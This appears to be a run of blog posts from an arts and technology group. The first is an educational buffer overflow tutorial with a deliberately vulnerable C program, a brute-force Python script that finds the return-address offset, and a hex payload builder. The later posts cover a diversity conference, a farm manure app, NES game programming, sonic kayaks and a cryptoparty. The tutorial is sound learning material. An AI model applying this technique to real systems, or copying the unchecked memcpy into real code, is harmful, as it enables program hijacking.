My first buffer overflow exploit

I know worryingly little about the world of computer security – I’ve probably written a huge amount of exploitable code in my time, so it’s a good idea as a programmer to spend a bit of effort finding out more about how our programs can be compromised in order to gain awareness of the issues.

The key to understanding exploits is the concept of the universal machine – the fact that trying to restrict what a computer can do is literally fighting against the laws of physics. Lots of money can be poured into software which sometimes only takes a couple of days to get compromised. It’s a Sisyphean task where the goal can only be to make it “hard enough” – as it’s likely that anything complex enough to be useful is vulnerable in some way.

Having said that, the classic exploit is quite avoidable but regrettably common – the buffer overflow, a specific kind of bug which makes it possible to write over a program’s stack and take control of its behaviour externally. This was about as much as I knew, but I didn’t really understand the practicalities so I thought I’d write an example to play with. There are quite a lot of examples online, but a lot of them are a little confusing so I thought I’d try a simpler approach.

Here is a function called “unlock_door”. We’ll compile this into a C program and try to force it to execute even though it’s never called from the program (the complete file also needs stdio.h, stdlib.h and string.h included at the top):

void unlock_door() {
  printf("DOOR UNLOCKED\n");
  exit(1); // assumed: a distinct exit code so the search script can spot success
}

Now we need a vulnerability. This could be something completely unrelated to “unlock_door” but called in the same program – or in its library code:

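void vulnerable(char *incoming_data, unsigned int len) {
    char fixed_buffer[10];
    // woop! put some variable length data in
    // a fixed size container with no checking
    memcpy(fixed_buffer, incoming_data, len);
    // print out the return pointer, helpful for debugging the hack!
    // (assumed here to come from GCC's __builtin_return_address)
    printf("return pointer is: %p\n",
           __builtin_return_address(0));
}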

The dodgy memcpy call copies incoming_data into fixed_buffer on the stack which is 10 bytes big. If incoming_data is bigger then it will copy outside of the reserved memory and overwrite other data on the stack. One of the other things stored on the stack is the return address value – which tells the program where the function was called from so it can go back when it’s finished. If we can set incoming_data from outside the program, then we can exploit it to redirect program flow and jump into unlock_door instead of returning properly.

We’ll make getting data into the program very simple indeed: it arrives as a base16 encoded argument string, which main converts to binary data and passes to our vulnerable function:

// decode a hex string into newly allocated binary data, returning its size in bytes
unsigned int base16_decode(const char *hex, char **data) {
  unsigned int str_size = strlen(hex);
  *data = malloc(str_size/2);
  for (unsigned int i=0; i<str_size; i+=2) {
    if (sscanf(&(hex[i]), "%2hhx", &((*data)[i/2])) != 1) {
      return 0;
    }
  }
  return str_size/2;
}

int main(int argc, char **argv) {
  char *data;
  unsigned int size = base16_decode(argv[1],&data);
  // hand the attacker controlled bytes to the vulnerable function
  vulnerable(data, size);
  printf("normal exit, door is locked\n");
  return 0;
}

This is our vulnerable C program finished. If we run it with just a few bytes of data it operates normally and prints out the current return pointer, sending it back into the main function it was called from:

$ ./dodgy_door_prog 0000000000
return pointer is: 0x40088c
normal exit, door is locked

We can now inspect it in order to figure out the exploit. The first thing we can do is run the standard binutils “nm” command on the binary, which prints out the addresses of all the functions in the executable. We can search this with grep to print the address of the target function we want to call:

$ nm dodgy_door_prog | grep unlock_door
00000000004007fa T unlock_door

The smart thing to do next is to work out where the return pointer would be relative to the fixed_buffer variable and offset this address to provide a payload to send to the program – I’m not smart though, so I wrote a python program to figure it out for me:

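import os

# this is stored in memory in reverse (little endian format)
unlock_door_addr = "fa0740"

def build_payload(length):
    return "00"*length+unlock_door_addr

ret = 0
count = 0
# try increasing offsets until we get the exit code from unlock_door
# ignore all segfaults and bus errors etc and keep retrying
# (os.system gives the shell's exit code shifted left 8 bits, and the shell
# reports a crash as 128+signal: 35584 is a segfault, 34560 a bus error,
# 34304 an abort and 33792 an illegal instruction)
while ret in [0,35584,34560,34304,33792]:
    payload = build_payload(count)
    cmd="./dodgy_door_prog "+payload
    print(cmd)
    ret = os.system(cmd)
    count += 1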

It took me a while to figure out that addresses are stored in memory backwards to what you’d expect, because of the little-endian memory layout (on intel and everything else these days). The script keeps adding zeros in order to offset the target address until it sits in the right bit of stack memory (you can see the return pointer gradually getting corrupted) and eventually triggers the function:

./dodgy_door_prog 00000000000000000000000000000000000000fa0740
return pointer is: 0x40088c
Segmentation fault (core dumped)
./dodgy_door_prog 0000000000000000000000000000000000000000fa0740
return pointer is: 0x40088c
Bus error (core dumped)
./dodgy_door_prog 000000000000000000000000000000000000000000fa0740
return pointer is: 0x40088c
Bus error (core dumped)
./dodgy_door_prog 00000000000000000000000000000000000000000000fa0740
return pointer is: 0x400840
Segmentation fault (core dumped)
./dodgy_door_prog 0000000000000000000000000000000000000000000000fa0740
return pointer is: 0x404007
Segmentation fault (core dumped)
./dodgy_door_prog 000000000000000000000000000000000000000000000000fa0740
return pointer is: 0x4007fa

The successful offset is 24 bytes. Now the good news is that this is only possible on GCC if we compile with “-fno-stack-protector”. By default for the last year or so, it protects functions that allocate arrays on the stack by using a random “canary” value pushed to the stack: if the canary gets altered, it stops the program before the function returns. However, not all functions are checked this way as it’s slow, so it’s quite easy to circumvent, for example if the vulnerable code writes through the address of a local variable rather than into an array.
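To make the byte order and the offset concrete, here is a small Python 3 sketch that builds the same hex argument directly from the address reported by nm. The helper name make_payload is my own, and dropping the high zero bytes is just a way of matching the three byte address used in the script above.

```python
import struct

def make_payload(offset, target_addr):
    """Return the hex argument: `offset` filler bytes, then the target address."""
    filler = b"\x00" * offset
    # "<Q" packs an unsigned 64 bit value least significant byte first
    addr_bytes = struct.pack("<Q", target_addr)
    # drop the high zero bytes, so only the low bytes of the
    # existing return address get overwritten
    addr_bytes = addr_bytes.rstrip(b"\x00")
    return (filler + addr_bytes).hex()

# 24 is the offset the search found, 0x4007fa the address nm printed
print(make_payload(24, 0x4007fa))
```

This prints 48 zeros followed by fa0740, the same argument as the last run in the log.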

More advanced versions of this exploit also insert executable code into the stack to do things like start a shell process so you can run any commands as the program. There is also an interesting technique called “Return Oriented Programming” where you can analyse an executable to find snippets of code that end in returns (called “gadgets”) and string them together to run your own arbitrary programs. This reminds me of the recent work we’ve been doing on biological viruses, as it’s analogous to how they latch onto sections of bacterial DNA to run their own code.

Report: Rethinking Diversity in a Rural Region Conference

FoAM Kernow is an organisation in one of the most disadvantaged parts of the UK. Many of the gaps in our society are particularly obvious in Cornwall: the separation between those whom our social structures benefit and those whom they do not is clear to see in the divide between the coastal and inland regions, and in many finer grained distinctions.

In our work we have gaps too – on the one hand there are projects like Future Thinking For Social Living and codeclub where we get out and go to people who can benefit most from our work, and on the other we have our workshops at Jubilee Warehouse where we do well in terms of gender and ethnicity, but not so well when it comes to socioeconomic diversity. What makes this more important is that we are situated in a town that is in the bottom 10% of income levels nationally. One of the central questions for the next year is how we can combine our global collaborations and research projects and make use of them in the very local situation.

We had a chat with our friends at FEAST and Cultivator in Redruth at the end of last year who told us about a timely event: Rethinking Diversity in a Rural Region, a conference organised by the Cornwall Museums Partnership at Wheal Martyn in St Austell. Here are my notes from the day.

"[Many] people have no understanding of what you offer"

The event was kicked off by Rachel Bell, who has been working with museums across Cornwall as part of her creative intern role over the last year. She shared her observations of museums here (which was useful as I am new to this sector), such as the mix of global focus and local heritage in Cornish museums, but an obvious lack of teenagers and people from different cultures visiting them.

Next to speak was Andrea Gilbert, who works for Inclusion Cornwall. Andrea listed the official Protected Characteristics of concern when we are talking about inclusion and diversity. Something I liked was that her organisation has a very open approach when talking to people about these matters, it's ok to get it wrong – to use the wrong descriptions for categories or the wrong words – the important thing is to muddle through and learn.

One focus for Inclusion Cornwall is working with people on health related benefits. There are 23,000 people here in this category, making it an important group to target. Some others she mentioned included the 60 rough sleepers in Cornwall and the high number of migrant agricultural workers. There are currently 500 vacancies for these jobs – so it's not a case of "taking our jobs", and it results in 59 languages being spoken in the schools here! There were also 10 convictions involving modern slavery here recently, so many seriously disadvantaged people are hidden from view.

When talking about inclusion and cultural organisations Andrea says that it's very much a simple matter that "people have no understanding of what you offer". It seems that there is much opportunity to change this.

"Diversity is about renewing your sense of belonging to your community"

A provocative talk by Tehmina Goskar went a little more into the motivations and philosophy for increasing diversity. We need to start by understanding our own personal biases, as well as asking "who will miss you if you are gone?". One big motivation is that "diversity is about renewing your sense of belonging to your community".

The places where we talk about this matter too: avoiding corporate meeting rooms and being in different environments is important – and the Wheal Martyn museum (although having acoustic issues) was a great example of this kind of consideration. We saw lots of government statistics and phrases that are important in order to understand the official interpretation of the problems. Cornwall has 1m tourists per year resulting in a £2bn economy, and 68% of small businesses (SMEs) are in rural regions, so it seems that the cities are largely the preserve of the big companies. 20% of people living here have never been online. There is a concept used by DEFRA of Rural Proofing, where the needs of rural people are considered in policy. Problems such as mobile coverage and lack of access to skills, R&D and transport are considered relevant.

There are more elderly people in rural areas too, and small pockets of deprivation which are harder to identify and easily overlooked by institutions. Tehmina suggested that we take matters into our own hands and get out and map them ourselves, and get to know our community better.

In practical terms diversity leads to more talent in your organisation, and longer term security – while a narrow focus tends to actually be more expensive, and shorter term. Ultimately, diversity is a creative force in its own right, not to be ignored.

"Diversity is a creative force"

We had some quick examples of case studies next. Jan Horrell told us about the Wheal Martyn Memory cafe, which provides help and social contact for people with memory loss and importantly also some time out for their carers. Over time their participants went from being simply provided for, to more actively joining in and eventually running their own activities for the others in the group. They also worked with Story Republic to provide theatre and story telling activities.

Zoe Burkett from Penlee House gallery and museum wanted to attract younger volunteers to help out with the 150 or so existing ones. They worked with Carefree, who provide a different service to the normal 'working with schools' approach commonly used by organisations. Instead of deciding on an activity to do with the young people, they asked them what they would like to do – and they decided on an artistic skillsharing event across the generations to provide something for all the volunteers working there.

Liz Shepherd from Royal Cornwall Museum has been working with migrant families whose transient lives mean their children tend to be working at lower academic levels for their age. She decided to focus on music, which has otherwise been pushed to the edges of the curriculum in the UK. Music provides a cross cultural link for Polish, Lithuanian and Romany and Gypsy traveller families. She worked with the Cornwall Music Education Hub to help both children and the wider families to mix.

"the need for inclusive practice in physical and intellectual access are greater than ever before"

The final talk was by Becki Morris from the Disability Cooperative Network, who attended the Rio paralympics inclusion summit and said that "the need for inclusive practice in physical and intellectual access are greater than ever before". Her talk contained a lot of practical advice too, and introduced the concept of Universal Design as a way to think about these issues: building things to cater for diversity makes them better for everybody, rather than specialising things for different people.

Using black text on yellow for her slides, and matt rather than gloss for signs, were a couple of simple design choices she talked about which can make a big difference. Also, if you are running a museum, or using a space for any public event, you should be publishing an access statement to make clear what the facilities are.

It was also interesting to see open source mentioned in this context, as being important for accessibility generally. Groups she mentioned included purple space, a network of disability employee networks, and AXSChat, an "open online community of individuals dedicated to creating an inclusive world". Becki also mentioned the issues we are facing politically, and that the times are bad – but they do also represent a new opportunity to break down some very old barriers.

In the afternoon I took part in a couple of workshops. The first, run by Emma Saffy Wilson and Becky Palmer, was "how to reach new audiences". Some of the good ideas that came up included using our own families – they often represent a lot of diversity in themselves, and we should use this. With disadvantaged groups, the main issue is really confidence, so long term relationships need to be fostered. One way is to talk to other organisations with a history of working with groups you want to reach – but these contacts need to be treated very gently in themselves. At the end of the day, genuine listening and long term thinking are needed.

The second workshop I took part in, run by Theo Blackmore, was "What should museums be doing to be more inclusive?". Although I was a bit less able to contribute to this, there were a lot of interesting suggestions. Just getting people used to spaces is very important: simple things first, like using toilets in museums to simply get inside, and understanding that it's their space as much as anyone else's – that they are allowed to "hang out" there. Doing pop ups in galleries and museums is good too, to get different people involved, as is opening late or at weekends for people who prefer quieter times rather than when it's busy.

Another idea from this workshop that seemed to resonate well was the "mantle of the expert", this concept from drama and theatre sets up a situation where (usually) young people are assigned the role of expertise over a specific subject or object which they learn and research themselves and then report back. This flips the power relation in a teaching situation.

So, plenty of things to think about. One of the biggest things was simply to find out about the organisations we should be talking to in relation to upcoming projects we are working on. Also when we are talking to researchers and artists looking for new ideas for who they should be reaching with their work this gives us a big picture of the situation in the rural region.

Farm Crap App Pro Edition

This autumn we have been developing a new version of the Farm Crap App with the Duchy College and Rothamsted Research. This project is about tackling the difficulties farmers have using natural fertilisers while needing to report realistic figures to the government agencies – and understanding the guidance they provide. The original version was a big success, but only contained information on a handful of manures and didn't deal with the nutrient content of the soil.

In the "Pro edition" we are adding a lot more detail – the nutrients already in the soil can be estimated based on the type of the soil and the previous crops grown there. The needs of specific crops can also be added – we are concentrating on grass, barley and wheat for the moment – as this is a huge area to deal with. Once you have this information you can subtract it from the nutrients added by the manure to come up with a picture of which manure is best suited to a large range of crop, soil, rainfall and seasonal situations.
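As a rough sketch of that subtraction (not the app's actual code), the balance for one field could be worked out like this. The function name and every number here are made-up placeholders in kg per hectare, not figures from the official tables.

```python
def nutrient_balance(crop_need, soil_supply, manure_supply):
    """Return the surplus (+) or shortfall (-) for each nutrient."""
    balance = {}
    for nutrient in crop_need:
        # what the crop still needs once the soil's own supply is counted
        still_needed = max(crop_need[nutrient] - soil_supply.get(nutrient, 0), 0)
        balance[nutrient] = manure_supply.get(nutrient, 0) - still_needed
    return balance

# hypothetical figures for illustration only
crop_need = {"N": 100, "P": 40, "K": 60}
soil_supply = {"N": 30, "P": 50, "K": 20}
manure_supply = {"N": 50, "P": 10, "K": 40}
print(nutrient_balance(crop_need, soil_supply, manure_supply))
```

Running the same calculation for each manure type gives a set of balances to compare for a particular crop and soil.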


We are used to dealing with scientific data straight from research, but this data has been processed into a set of tables aimed at farmers and consultants by the agencies and civil servants based on the original research, which is very different. A lot of times you get the feeling that there is an underlying model being used which would be good to have access to. Meanwhile, we are taking these tables and converting them into a usable, minimal set of options that can be accessed and played with in the field – where the decisions happen.

We are also adding a new mapping feature, which was very much the most requested feature from the farmers and producers we tested it with. This allows you to draw on the map to record each field, which means we can get the size estimation from the GPS coordinates fairly accurately as well.
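One common way to estimate an area from GPS corners, which may or may not be what the app does, is to flatten the coordinates onto a local plane and apply the shoelace formula. The function name and the Earth radius constant below are my own choices for this sketch.

```python
import math

EARTH_RADIUS_M = 6371000.0  # mean Earth radius, an approximation

def field_area_m2(corners):
    """Approximate area in square metres of a field drawn as
    (latitude, longitude) corners in degrees, listed in order."""
    ref_lat, ref_lon = corners[0]
    mean_lat = math.radians(sum(lat for lat, _ in corners) / len(corners))
    # project to metres east/north of the first corner
    points = [
        (EARTH_RADIUS_M * math.radians(lon - ref_lon) * math.cos(mean_lat),
         EARTH_RADIUS_M * math.radians(lat - ref_lat))
        for lat, lon in corners
    ]
    # shoelace formula over the projected polygon
    total = 0.0
    for i in range(len(points)):
        x1, y1 = points[i]
        x2, y2 = points[(i + 1) % len(points)]
        total += x1 * y2 - x2 * y1
    return abs(total) / 2.0
```

The flat projection is only reasonable for field sized shapes, where the curvature of the Earth makes very little difference.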

NES/Famicom game programming discoveries

Working on a NES game you are treading in the footsteps of programmers from the 80's, and going back to modern development feels strangely bloated and inefficient in comparison. This is a log of some of the things I've encountered writing game code for the What Remains project.

Firstly, although it seemed like a lunatic idea at the start, I'm very happy we decided to build a compiler first so I could use a high level language (Lisp) and compile it to the 6502 assembler that the NES/Famicom needs to run. This has made it so much faster to get stuff done, and for example to be able to optimise the compiler for what is needed as we go along, without having to change any game code. I'm thinking about how to bring this idea to other projects on less esoteric hardware.

These are the odds and ends that I've built into the game, and some of the reasons for decisions we've made.



As well as sprite drawing hardware, later games machines (such as the Amiga) had circuitry to automatically calculate collisions between sprites and also background tiles. There is a feature on the NES that does this for only the first sprite – but it turns out this is more for other esoteric needs, and for normal collisions you need to do your own checks. For background collisions to prevent walking through walls, we have a list of bounding boxes (originally obtained by drawing regions over screenshots in gimp) for each of the two map screens we're building for the demo. We're checking a series of 'hotspots' on the character against these bounding boxes depending on which way you are moving, shown in yellow below.


You can also check for collisions between two sprites – all the sprites we're using are 2×2 'metasprites' as shown above as these are really the right size for players and characters, as used in most games. These collisions at the moment just trigger animations or a 'talk mode' with one of the characters.
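The two kinds of check can be sketched in Python (the game itself is Lisp compiled to 6502, so this is only an illustration). The hotspot offsets and the wall box are invented for the example; the 16 pixel size assumes a 2×2 metasprite built from 8×8 sprites.

```python
# hypothetical hotspot offsets from the top left of a 16x16 character,
# a couple per direction of travel
HOTSPOTS = {
    "left":  [(0, 8), (0, 15)],
    "right": [(15, 8), (15, 15)],
    "up":    [(4, 8), (11, 8)],
    "down":  [(4, 15), (11, 15)],
}

def point_in_box(px, py, box):
    """box is (left, top, right, bottom) in pixels, inclusive."""
    left, top, right, bottom = box
    return left <= px <= right and top <= py <= bottom

def blocked(x, y, direction, walls):
    """True if any hotspot for this direction lands inside a wall box."""
    return any(
        point_in_box(x + dx, y + dy, box)
        for dx, dy in HOTSPOTS[direction]
        for box in walls
    )

def sprites_overlap(ax, ay, bx, by, size=16):
    """True if two metasprites of the same size overlap at all."""
    return abs(ax - bx) < size and abs(ay - by) < size
```

Only testing the hotspots for the current direction keeps the number of comparisons per frame small, which matters on a machine this slow.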

Entity system

With the addition of scrolling and also thinking about how to do game mechanics, it became apparent that we needed a system for dealing with characters, including the player – normally this is called an entity system. The first problem is that with multiple screens and scrolling, the character position in the world is different to the screen position which you need to give to the sprites. The NES screens are 256 pixels wide, and we are using two screens side by side, so the 'world position' of a character in the x axis can be from 0 to 511. The NES is an 8 bit console, and this range requires a 16 bit value to store. We also need to be able to turn off sprites when they are not visible due to scrolling, otherwise they pop back on the other side of the screen. The way we do this is to store a list of characters, or entities, each of which contains five bytes:

  1. Sprite ID (the first of the 4 sprites representing this entity)
  2. X world position (low byte)
  3. X world position (high byte) – ends up 0 or 1, equivalent to which screen the entity is on
  4. Y world position (only one byte needed as we are not scrolling vertically)
  5. Entity state (this is game dependent and can be used for 8 flags, one per bit, such as "have I spoken to the player yet" or "am I holding a key")

We are already buffering the sprite data in "shadow memory" which we upload to the PPU at the start of every frame, the entity list provides a second level of indirection. Each time the game updates, it loops through every entity converting the world position to screen position by checking the current scroll value. It can also see if the sprite is too far away and needs clipping – the simplest way to do that seems to be simply setting the Y position off the bottom of the screen. In future we can use the state byte to store animation frames or game data – or quite easily add more of these as needed.
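The per-entity update can be sketched like this in Python (again only an illustration of the idea, not the game's Lisp code). The off screen Y value of 240 is my assumption, chosen because the NES picture is 240 lines tall, and hiding an entity as soon as its left edge leaves the screen is a simplification.

```python
SCREEN_WIDTH = 256
OFFSCREEN_Y = 240  # assumed: any Y at or below the bottom of the picture hides a sprite

def entity_screen_position(entity, scroll_x):
    """entity is the five bytes [sprite_id, x_lo, x_hi, y, state].
    Returns the (x, y) to write into the shadow sprite memory."""
    sprite_id, x_lo, x_hi, y, state = entity
    # rebuild the 16 bit world position from its two bytes
    world_x = x_lo | (x_hi << 8)
    screen_x = world_x - scroll_x
    if screen_x < 0 or screen_x >= SCREEN_WIDTH:
        # not visible with this scroll value, so park it off the bottom
        return 0, OFFSCREEN_Y
    return screen_x, y

# an entity at world x = 300 (low byte 0x2C, high byte 1), y = 100
villager = [4, 0x2C, 1, 100, 0]
print(entity_screen_position(villager, 100))
print(entity_screen_position(villager, 0))
```

With a scroll of 100 the entity appears at screen x 200; with no scroll it is on the second screen, so it gets moved off the bottom instead of wrapping round.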



Obviously I was itching to write a custom sound driver to do all sorts of crazy stuff, but time is very limited and it's better to have something which is compatible with existing tracker software. So we gave in and used an 'off the shelf' open source sound driver. First I tried ggsound but this was a bit too demanding on memory and I couldn't get it playing back music without glitching. The second one I tried was famitone which worked quite quickly, the only problem I had was with the python export program! It only requires 3 bytes of zero page memory, which is quite simple to get the Lisp compiler to reserve – and a bit of RAM which you can easily configure.

New display primitives

I wrote before about how you need to use a display list to jam all the graphics data transfer into the first part of each frame, the precious time while the PPU is inactive and can be updated. As the project went on there were a couple more primitive drawing calls I needed to add to our graphics driver.

To display our RPG game world tiles, the easiest way is putting big lists describing an entire screen worth of tiles into PRG-ROM. These take up quite a bit of space, but we can use the display list to transfer them chunk by chunk to the PPU without needing any RAM, just the ROM address in the display list. I'm expecting this will be useful for the PETSCII section too.

I also realised that any PPU transfer ideally needs to be scheduled by the display list to avoid conflicts, so I added a palette switch primitive too. We are switching palettes quite a lot, between each game mode (we currently have 3: intro, RPG and the PETSCII demo), but we're also using an entirely black palette to hide the screen refresh between these modes. So the last thing we do in the game mode switch process (which takes several frames) is set the correct palette to make everything appear at once.

Memory mapping

By default you get 8K of data to store your graphics – this means 256 sprites and 256 tiles only. In practice this is not enough to do much more than very simple games, and we needed more than this even for our demo. The fact that games are shipped as hardware cartridges meant that this could be expanded fairly simply – so most games use a memory mapper to switch between banks of graphics data – and also code can be switched too.

There are hundreds of variants of this technique employing different hardware, but based on Aymeric's cartridge reverse engineering we settled on MMC1 – one of the most common mappers.

In use this turns out to be quite simple – you can still only use 256 tiles/sprites at a time, but you can switch between lots of different sets, something else that happens between game modes. With MMC1 you just write repeatedly to an address in the cartridge's address space, outside of normal RAM, to talk to the mapper via serial communication, one bit per write – different address ranges control different things.
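As I understand the commonly documented MMC1 behaviour, a register value is sent as five writes carrying one bit each, lowest bit first, and the address of the fifth write picks the register. The Python below is a simplified model of that to show the idea; it is not our driver code, and the class and function names are made up.

```python
def mmc1_write_sequence(address, value):
    """Return the five (address, byte) CPU writes that send a 5 bit value."""
    return [(address, (value >> bit) & 1) for bit in range(5)]

class MMC1Model:
    """A much simplified model of the mapper's serial shift register."""
    def __init__(self):
        self.shift = 0
        self.count = 0
        self.registers = {}

    def cpu_write(self, address, byte):
        if byte & 0x80:
            # a write with bit 7 set resets the shift register
            self.shift = 0
            self.count = 0
            return
        self.shift |= (byte & 1) << self.count
        self.count += 1
        if self.count == 5:
            # address bits 13 and 14 select which register is loaded:
            # 0 control, 1 and 2 graphics banks, 3 program bank
            self.registers[(address >> 13) & 3] = self.shift
            self.shift = 0
            self.count = 0

mapper = MMC1Model()
for address, byte in mmc1_write_sequence(0xA000, 0b10110):
    mapper.cpu_write(address, byte)
print(mapper.registers)
```

On the real machine the same thing is usually done with a store followed by a shift right, repeated five times.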


Sonic Kayaks: musical instruments for marine exploration

Here is a bit of a writeup of the gubbins going into the sonic kayaks project. We only have a few weeks to go until the kayaks’ maiden voyages at the British Science Festival, so we are ramping things up, with a week of intense testing and production last week with Kirsty Kemp, Kaffe Matthews and Chris Yesson joining us at FoAM Kernow. You can read Amber’s report on the week here.



The heart of the system is the Raspberry Pi 2. This is connected to a USB GPS dongle, and running the sonic bike software we have used in many cities over the last couple of years. We have some crucial additions such as two water temperature sensors and a hydrophone. We have also switched all audio processing over to pure data, so we can do a lot more sound wise – such as sonify sensor data directly.

How to do this well has been a tricky part to get right. There is a trade off between constant irritating sound (in a wild environment this is more of a problem than a city, as we found out in the first workshop) and ‘overcooking’ the sound so it’s too complex to be able to tell what the sensors are actually reporting.


This is the current pd patch – I settled on cutting out the sound when there is no change in temperature, so you only hear anything when you are paddling through a temperature gradient. The pitch represents the current temperature, but it’s normalised to the running minimum and maximum the kayak has observed. This makes it much more sensitive, but it takes a few minutes to self calibrate at the start. Currently it ranges from 70 to 970 Hz, with a little frequency modulation at 90 Hz to make the lower end more audible.
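The real patch is in pure data, but the mapping can be sketched in Python. The linear scaling between the two frequencies and the exact "has it changed" test are my assumptions, and the 90 Hz modulation is left out.

```python
MIN_HZ = 70.0
MAX_HZ = 970.0

class TemperatureSonifier:
    def __init__(self):
        self.lowest = None
        self.highest = None
        self.previous = None

    def update(self, temperature):
        """Return a pitch in Hz for this reading, or None for silence."""
        if self.lowest is None:
            self.lowest = self.highest = temperature
        # keep track of the running minimum and maximum seen so far
        self.lowest = min(self.lowest, temperature)
        self.highest = max(self.highest, temperature)
        changed = self.previous is not None and temperature != self.previous
        self.previous = temperature
        span = self.highest - self.lowest
        if not changed or span == 0:
            return None
        # normalise to the observed range, then scale to the pitch range
        normalised = (temperature - self.lowest) / span
        return MIN_HZ + normalised * (MAX_HZ - MIN_HZ)
```

Because the range starts out with zero width, the first readings are silent or jump between the extremes, which is the self calibration period mentioned above.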

Here it is on the water with our brand new multi-kayak compatible mounting system and 3D printed horn built in blender. The horrible sound right at the start is my rubbish phone.

In addition to this, we have the hydrophone, which is really the star of the show. Even with a preamp we’re having to boost it in pure data by 12 times to hear things, but what we do hear is both mysterious and revealing. It seems that boat sounds are really loud – you can hear engines for quite a long way, useful in expanding your kayak senses if they are behind you. We also heard snapping sounds from underwater creatures and further up the Penryn river you can hear chains clinking and there seems to be a general background sound that changes as you move around.

We still want to add a layer of additional sounds to this experience for the Swansea festival for people to search for out on the water. We are planning different areas so you can choose to paddle into or away from “sonic areas” comprising multiple GPS zones. We spent the last day with Kaffe testing some quick ideas out:

Looking at sea temperature and sensing the hidden underwater world, climate change is the big subject we keep coming back to, so we are looking for ways to approach this topic with our strange new instrument.

Crab camouflage citizen science game

The Natural History Museum London commissioned us to build a crab catching camouflage game with the Sensory Ecology Group at the University of Exeter (who we’ve worked with previously on the Nightjar games and Egglab). This citizen science game is running on a touchscreen as part of the Colour and Vision exhibition which is running through the summer. Read more about it here.





Foam Kernow crypto ‘tea party’

Last night we ran an experimental cryptoparty at Foam Kernow. We’d not tried something like this before, and don’t have any particular expertise with cryptography – so this was run as a research gathering for interested people to find out more about it.

One of the misconceptions about cryptography I wanted to start with is that it’s just about hiding things. We looked at Applied Cryptography by Bruce Schneier, where he starts by explaining the 3 things that cryptography provides beyond confidentiality:

Authentication. It should be possible for the receiver of a message to ascertain its origin; an intruder should not be able to masquerade as someone else.
Integrity. It should be possible for the receiver of a message to verify that it has not been modified in transit; an intruder should not be able to substitute a false message for a legitimate one.
Nonrepudiation. A sender should not be able to falsely deny later that they sent the message.

It’s interesting how confidentiality is tied up with these concepts – you can’t compromise one without damaging the others. Also how these are a requirement for human communication, but we’ve become so used to living without them.

One of the most interesting things was to hear the motivations for people to come along and find out more about this subject. There was a general feeling of loss of control over online identity and data. Some of the more specific aspects:

  • Ambient data collection, our identity increasingly becoming a commodity – being modeled for purposes we do not have control over.
  • Centralisation of communication being a problem – e.g. gmail.
  • Never knowing when your privacy might become important – e.g. you find yourself in an abusive relationship, suddenly it matters.
  • Knowing that privacy is something we should be thinking about but not wanting to. Similar to knowing we shouldn’t be using the car but doing it anyway.
  • Awareness that our actions don’t just affect us, but our families’, friends’ and colleagues’ privacy – needing to think about them too.
  • Worrying when googling about health, financial or legal subjects.
  • Being aware that email is monitored in the workplace.

We talked about the encryption we already use – gpg for email with thunderbird and Tor for browsing anonymously. One of the tricky areas we talked about was setting this kind of thing up for mobile – do you need specific apps, an entire OS or specific hardware? This is something we need to spend a bit more time looking into.

Personally speaking, on my phone I use a free firewall so I can at least control which apps on my phone can be online – and I only became aware of this from developing for android and seeing the amount of ‘calling home’ that completely arbitrary applications do regularly.

We also discussed asymmetric key pair cryptography – how the mathematics meshes so neatly with social conventions, so you can sign a message to prove you wrote it, or sign someone else’s public key to build up a ‘web of trust’.
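To show the signing idea in miniature, here is a toy version of textbook RSA in Python (3.8 or later). The primes are tiny and there is no padding, so this is completely insecure and nothing like what gpg really does; it only shows that the private key makes a signature which anyone can check with the public key.

```python
import hashlib

# toy key pair built from two small primes: far too small to be secure
P, Q = 61, 53
N = P * Q                           # public modulus
E = 17                              # public exponent
D = pow(E, -1, (P - 1) * (Q - 1))   # private exponent

def digest(message):
    """Squash a message (bytes) down to a number smaller than N."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % N

def sign(message):
    """Only the holder of the private exponent D can produce this."""
    return pow(digest(message), D, N)

def verify(message, signature):
    """Anyone with the public values E and N can check a signature."""
    return pow(signature, E, N) == digest(message)

signature = sign(b"meet at the tea party")
print(verify(b"meet at the tea party", signature))
```

Signing someone else's public key works the same way, with their key taking the place of the message.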

We didn’t get very practical, this was more about discussing the issues and feelings on the topic. That might be something to think about for future cryptoparties.